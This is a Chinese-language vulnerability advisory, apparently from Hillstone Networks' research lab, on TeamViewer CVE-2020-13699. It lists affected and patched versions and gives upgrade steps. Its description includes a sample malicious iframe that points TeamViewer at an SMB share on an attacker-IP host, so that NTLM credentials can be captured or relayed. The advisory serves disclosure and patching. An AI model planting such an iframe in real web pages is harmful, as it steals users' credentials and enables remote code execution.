漏洞通告|TeamViewer 遠程代碼執行漏洞通告 (CVE-2020-13699)

漏洞背景
TeamViewer介紹

TeamViewer是由德國公司TeamViewer GmbH開發的應用程式，可用於Windows，macOS，Linux，Chrome OS，iOS，Android，Windows RT Windows Phone 8和BlackBerry作業系統。

它主要用於遠程訪問和控制各種類型的計算機系統和行動裝置，但也提供協作和演示功能（例如，桌面共享，Web會議，文件傳輸等）。

近日，TeamViewer官方發布了TeamViewer URL處理的風險通告。TeamViewer存在未引用的搜索路徑或元素的安全缺陷，由於應用程式沒有正確引用它的自定義URI處理程序，當安裝了TeamViewer的易受攻擊版本的用戶訪問惡意創建的網站時，可能會被黑客利用。

漏洞描述

TeamViewer存在未引用的搜索路徑或元素的安全缺陷，由於應用程式沒有正確引用它的自定義URI處理程序，當安裝有TeamViewer的易受攻擊版本的系統訪問惡意創建的網站時，可能會被利用。

攻擊者可以使用精心製作的URL（iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs'）將惡意iframe嵌入網站中，從而啟動TeamViewer Windows桌面客戶端並強制其打開遠程SMB共享。

Windows將在打開SMB共享時，執行NTLM身份驗證，並且可以轉發該請求（使用如響應程序之類的工具）以執行代碼（或捕獲該請求以進行哈希破解）。

該漏洞的利用可以遠程啟動，並且不需要事先進行身份驗證，是水坑攻擊的理想選擇。

此命令表示本地安裝的TeamViewer應用程式通過伺服器消息塊（SMB）協議連接到攻擊者的伺服器。攻擊者使用精心製作的URL將惡意iframe嵌入網站中，該URL 會啟動TeamViewer Windows桌面客戶端並迫使其打開遠程SMB共享。

由於是受害者的計算機發起與攻擊者的SMB共享連接，因此攻擊者不需要知道用戶的密碼，可自動通過身份驗證並獲得訪問權限。

研究人員表示：「Windows在打開SMB共享時將執行NTLM身份驗證，並且可以轉發該請求以執行代碼。」這會影響URI處理程序teamviewer10、teamviewer8、teamviewerapi、tvchat1、tvcontrol1、tvfiletransfer1、tvjoinv8、tvpresent1、tvsendfile1、tvsqcustomer1、tvsqsupport1、tvvideocall1和tvvpn1。

該漏洞的利用可以遠程啟動，並且不需要事先進行身份驗證，是水坑攻擊的理想選擇。

影響版本

TeamViewer < 8.0.258861

TeamViewer < 9.0.28860

TeamViewer < 10.0.258873

TeamViewer < 11.0.258870

TeamViewer < 12.0.258869

TeamViewer < 13.2.36220

TeamViewer < 14.2.56676

TeamViewer < 15.8.3

解決方案

打開TeamViewer -> 點擊按鈕幫助 -> 點擊按鈕關於TeamViewer -> 查看TeamViewer版本號。

目前廠商已發布補丁，Windows的TeamViewer用戶應考慮升級到新的程序版本，其中包括：8.0.258861、9.0.28860、10.0.258873、11.0.258870、12.0.258869、13.2.36220、14.2.56676、14.7.48350、15.8.3。下載連結：

https://www.teamviewer.cn/cn/download/windows/

參考信息

https://community.teamviewer.com/t5/Announcements/Statement-on-CVE-2020-13699/td-p/98448

https://jeffs.sh/CVEs/CVE-2020-13699.txt

https://community.teamviewer.com/t5/Announcements/Statement-on-CVE-2020-13699/td-p/98448

山石網科安全技術研究院簡稱「山石安研院」正式成立於2020年4月，是山石網科的信息安全智庫部門，其前身是原安全服務部下的安全研究團隊。山石安研院整體架構包括幹將、莫邪兩大安全實驗室，以及安全預警分析、高端攻防培訓兩支獨立的技術團隊。安研院主要負責反APT跟蹤和研究、出戰及承辦全球攻防賽事、高端攻防技術培訓、全球中英文安全預警分析發布、各類軟硬體漏洞挖掘和利用研究、承接國家網絡安全相關課題、不定期發布年度或半年度的各類技術報告及公司整體攻防能力展現。技術方向包括移動安全、虛擬化安全、工控安全、物聯安全、區塊鏈安全、協議安全、源碼安全、反APT及反竊密。

自2015年以來為多省公安廳提供技術支撐工作，為上合峰會、財富論壇、金磚五國等多次重大活動提供網絡安保支撐工作。在多次攻防賽事中連獲佳績，網安中國行第一名，連續兩屆紅帽杯冠軍、網鼎杯線上第一名，在補天杯、極棒杯、全國多地的護網演習等也都獲得優秀的成績，每年獲得大量的CNVD、CNNVD、CVE證書或編號。

如需幫助請諮詢 hslab@hillstonenet.com